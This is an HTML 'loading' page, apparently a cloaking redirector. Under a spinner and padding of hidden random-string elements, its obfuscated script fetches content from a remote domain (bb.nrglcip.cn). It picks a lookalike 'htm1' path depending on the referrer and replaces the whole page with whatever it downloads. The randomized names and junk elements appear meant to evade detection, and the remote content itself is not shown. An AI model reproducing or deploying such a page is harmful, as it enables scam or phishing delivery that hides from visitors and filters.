<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HEUfT95JwA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HEUfT95JwA .RPbKnwx5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HEUfT95JwA .content {
            line-height: 50px;
            text-align: center
        }

        .HEUfT95JwA .img {
            width: 100%
        }

        .HEUfT95JwA .y66fBHOZ {
            text-align: center
        }

        .HEUfT95JwA .y66fBHOZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HEUfT95JwA .y66fBHOZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HEUfT95JwA .y66fBHOZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HEUfT95JwA .y66fBHOZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HEUfT95JwA .y66fBHOZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HEUfT95JwA .y66fBHOZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HEUfT95JwA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function orjUuXThi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vPKBj = orjUuXThi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vPKBj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vPKBj +".html?a=share";
		}
		
        DLe7ulqI=url+"#"+new Date().getTime();
        DLe7ulqI && function() {
            $.get(DLe7ulqI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >YWiosctueOdsxXDXgcR7rFdfJljUGPZoO1t5ZaPevoMeelG</h1>
<ul style='display:none' >tozZanWNIQXrS4PerJawg9JXRjatIQZaejX3lYynftks78RL6YJDZ8NdFd92s5NxCi2ZEGvtvP6kuZRahWqTsVw</ul>
<div style='display:none'>zL2H3jDml3PjxWULjVpPm0Dhthd2aVWaScI3QAu9fYWeb401tzDqcdC</div>
<li style='display:none' >Lstaqa1azhv4HhoYAckLZ38sebpuHZUw9nBGA8Puz6Zb</li>
<span style='display:none'>DzLgNdYWxWsjTo0Lsb7Om91lrbVnqI14IGS</span><div class="HEUfT95JwA">
    <div class="RPbKnwx5">
        <div class="y66fBHOZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>M5aFHLbyCxeKIQxFQ4Q4f0spVok1ltg6wtQ7AtBX5Y3jZlXx</span>
<li style='display:none' >TvFRdoZFxqUZ6JR0kXHH</li>
<span style='display:none'>M5aFHLbyCxeKIQxFQ4Q4f0spVok1ltg6wtQ7AtBX5Y3jZlXx</span>
<h1 style='display:none' >CipuKoVKkMOo4wFfW5dD</h1>
<li style='display:none' >TvFRdoZFxqUZ6JR0kXHH</li>
<li style='display:none' >TvFRdoZFxqUZ6JR0kXHH</li>
<ul style='display:none' >I2pS0TZeh9i5GVnixARq2HkJ2hQuBwMvbsXMj6jfkmEHR5GDcp1N</ul>
<h1 style='display:none' >CipuKoVKkMOo4wFfW5dD</h1>
<h1 style='display:none' >CipuKoVKkMOo4wFfW5dD</h1></body>
</html>